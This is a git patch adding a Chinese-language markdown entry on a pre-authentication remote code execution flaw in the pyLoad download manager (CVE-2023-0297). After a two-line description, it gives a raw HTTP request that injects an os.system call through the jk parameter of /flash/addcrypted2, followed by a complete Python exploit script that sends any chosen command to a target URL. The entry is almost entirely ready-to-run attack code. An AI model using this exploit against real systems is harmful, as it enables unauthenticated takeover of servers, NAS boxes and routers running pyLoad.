From ab48be5a3edb9c324fb2053f18bba5e39a7f76ee Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 23 Nov 2023 21:32:32 +0800 Subject: [PATCH] =?UTF-8?q?Create=20pyLoad=E8=BF=9C=E7=A8=8B=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- pyLoad远程代码执行漏洞.md | 73 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 73 insertions(+) create mode 100644 pyLoad远程代码执行漏洞.md diff --git a/pyLoad远程代码执行漏洞.md b/pyLoad远程代码执行漏洞.md new file mode 100644 index 0000000..bdf8221 --- /dev/null +++ b/pyLoad远程代码执行漏洞.md @@ -0,0 +1,73 @@ + +## pyLoad远程代码执行漏洞 +pyLoad是一个用 Python 编写的免费和开源下载管理器,可用于NAS、下一代路由器、无头家庭服务器以及任何能够连接到互联网并支持 Python 编程语言的设备。 + +pyLoad 存在代码注入漏洞,未经身份验证的攻击者可以通过滥用 js2py 功能执行任意 Python 代码。 + +## poc +``` +POST flash/addcrypted2 HTTP/1.1 +Host:127.0.0.1 +Content-type: application/x-www-form-urlencoded + +jk=pyimport%20os;os.system("id");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa + +``` + +## exp脚本 +```python + +# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE) +# Date: 06-10-2023 +# Credits: bAu @bauh0lz +# Exploit Author: Gabriel Lima (0xGabe) +# Vendor Homepage: https://pyload.net/ +# Software Link: https://github.com/pyload/pyload +# Version: 0.5.0 +# Tested on: Ubuntu 20.04.6 +# CVE: CVE-2023-0297 + +import requests, argparse + +parser = argparse.ArgumentParser() +parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') +parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') +arguments = parser.parse_args() + +def doRequest(url): + try: + res = requests.get(url + '/flash/addcrypted2') + if res.status_code == 200: + return True + else: + return False + + except requests.exceptions.RequestException as e: + print("[!] Maybe the host is offline :", e) + exit() + +def runExploit(url, cmd): + endpoint = url + '/flash/addcrypted2' + if " " in cmd: + validCommand = cmd.replace(" ", "%20") + else: + validCommand = cmd + + payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' + test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload) + print('[+] The exploit has be executeded in target machine. ') + +def main(targetUrl, Command): + print('[+] Check if target host is alive: ' + targetUrl) + alive = doRequest(targetUrl) + if alive == True: + print("[+] Host up, let's exploit! ") + runExploit(targetUrl,Command) + else: + print('[-] Host down! ') + +if(arguments.url != None and arguments.cmd != None): + targetUrl = arguments.url + Command = arguments.cmd + main(targetUrl, Command) +```